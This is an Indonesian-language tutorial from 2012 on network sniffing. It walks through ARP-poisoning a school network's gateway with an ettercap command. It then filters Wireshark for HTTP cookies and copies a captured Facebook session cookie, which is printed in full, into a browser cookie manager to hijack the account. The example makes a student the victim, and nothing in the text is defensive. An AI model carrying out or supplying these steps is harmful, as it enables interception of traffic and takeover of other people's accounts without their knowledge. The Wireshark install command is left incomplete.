Teknik Sniffing menggunakan Ubuntu

 Author: Harrid Bunaiya <harridbunaiya@rocketmail.com>                                                              

 Title: Sniffing                                                                                                                              

 Date: Bekasi 13/10/2012                                                                                                                    

 Category: network, system, security                                                                                                  

 Intended: All Categories                                                                                                                    

 Level: Middle                                                                                                                                    

                                                                                                                                                           

 __  __                                              _ _

|    \/    | __  ___  ____           _____|  |   |

|   |\/|   |/ _`   \   \  /   /\   \   /\   /   / _  \   |   |

|   |  |   | (_|   |>   <     \   V  V  /   __/   |   |

| _|  |_ |\__,_/ _/\_ \     \ _ /\ _ / \___|_  |_ |

Daftar Isi:

[1] Pendahuluan/Pengertian

[2] Contoh Kasus

[3] Software Pendukung

[4] Instalasi Software

[5] How To Work

--[1] Pengertian

Sniffing adalah kegiatan melakukan penyadapan data pada suatu jaringan komputer.

Dalam suatu jaringan komputer ada yang disebut dengan istilah 'Paket Data' paket data disini berisi tentang

informasi yang diminta oleh sang client.

MITM (MAN IN THE MIDDLE)

Server ---------> | -------------> Client

                         ^

                     Sniffer

Sniffer <org yang melakukan Sniffing>  ketika paket data tersebut dikirim dari server ke client, paket - paket data tersebut akan

oleh disadap sang Sniffer untuk diambil informasinya.

--[2] Contoh Kasus

Eka sedang membuka halaman facebook pada saat waktu senggan disekolah, Eka membuka facebook pada jaringan sekolah

yang memiliki Gateway 192.168.5.129. Pada saat Eka membuka situs www.facebook.com maka data dari Server facebook menuju Eka

dikirim, pada saat pengiriman inilah sang Sniffer beraksi.

--[3] Software Pendukung

A. Ettercap

B. Wireshark

 C. OS Linux

--[4] Instalasi Software

A. ettercap

- cara install ettercap :

root@m0nk3y:/# apt-get install ettercap

B. wireshark

- cara install wireshark :

root@m0nk3y:/# apt-get install

--[5] How To Work

- Perintah ettercap untuk poison :

root@m0nk3y:/# ettercap -Tq -i wlan0 -M ARP /192.168.5.129/ //

- Jalankan Wireshark

root@m0nk3y:/# wireshark -&

- Pilih interface

- Setelah itu filter menjadi http.cookie

- Cari host apa yg mau di buka

- Buka paket data, klik kanan pilih follow tcp stream

- Copy cookie ke notepad

/*

datr=DA8ZT-C0x9rXeYcI33T-LTMd;

  lu=RgTkJLe_tEgw4wH2nKDtvSIg;

  fr=0JMdVwPS0aS6grvsa.AWWTsCovDfKGxq0CJC0A1gXOTJM.BQciOq.Ar.AWVY6Nwt;

  locale=en_GB;

  i_id=%3Aasync_conf;

  c_user=1302744707;

  xs=61%3ASy8rS--XVXwHtg%3A0%3A1350105537;

  p=1;

 presence=EM350156488EuserFA21302744707A2EstateFDsb2F0Et2F_5b_5dElm2FnullEuct2F1350104942BEtrFnullEtwF94331430EatF1350156042310G350156488437CEchFDp_5f1302744707F12CC;  

        act=1350156036996%2F55%3A2;

  sub=2097152 "

*/

- Masukin cookie nya di cookies manager

- Coba buka www.facebook.com dan lihat hasilnya